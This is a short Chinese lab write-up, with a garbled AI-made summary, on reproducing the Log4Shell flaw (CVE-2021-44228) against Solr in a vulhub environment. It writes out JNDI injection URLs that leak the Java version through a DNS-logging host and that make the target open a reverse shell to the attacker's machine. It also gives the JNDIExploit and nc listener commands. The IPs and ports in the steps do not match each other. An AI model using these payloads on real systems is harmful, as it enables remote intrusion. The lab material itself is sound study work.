Log4J反序列化

2024年2月13日#Web2Security15

AI 翻譯

這篇文章透過AI由英文翻譯成繁體中文。查看原文

AI 生成的摘要

在这个环境中，使用Kali系统作为攻击机，CentOS作为靶机。靶机的IP地址是192.168.1.4:8983，本机的IP地址是192.168.1.2，攻击机的IP地址是192.168.91.131。首先，开启靶机环境并请求一个DNS域名http://dnslog.cn/image.png，然后在hackbar中加载该URL。接下来，将提供的地址复制为image.png，并将域名改为刚刚申请的gswq4u.dnslog.cn。点击执行后，会出现一个页面，获得了反馈。然后，在JNDIExploit-1.2中输入指令java -jar .\JNDIExploit-1.2-SNAPSHOT.jar -i 本机IPimage.png，并在攻击机上打开端口监听命令：nc -lvp 4444。在hackbar中构建命令并执行后，发现监听的端口返回了shell。至此，复现完成。

環境：
/root/CVE/vulhub-master/log4j/CVE-2021-44228
Kali 系統一個 —— 需 nc 來監聽端口信息，作為攻擊機
本機：中轉機
centOS：靶機

地址信息：
靶機 IP：192.168.1.4:8983
本機 IP：192.168.1.2
攻擊機：192.168.91.131

開啟靶機環境

請求一個 DNS 域名
http://dnslog.cn/

域名：
gswq4u.dnslog.cn
打開 hackbar，先點一下 loadURL

將資料中提供的地址，複製

將後面的域名，改為剛剛申請的
gswq4u.dnslog.cn
http://192.168.1.4:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.f6pnnm.dnslog.cn}
點擊執行，出現下面頁面

這裡獲得了反饋

現在打開 JNDIExploit-1.2，
輸入指令
java -jar .\JNDIExploit-1.2-SNAPSHOT.jar -i 本機 IP

然後在攻擊機，打開端口監聽
命令：
nc -lvp 4444

在 hackbar 構建如下命令、
http://192.168.91.132:8983/solr/admin/cores?action=${jndi:ldap://192.168.1.2:1389/Basic/ReverseShell/192.168.91.131/1234}
點擊 Execute

發現監聽的端口返回了 shell

到此復現完成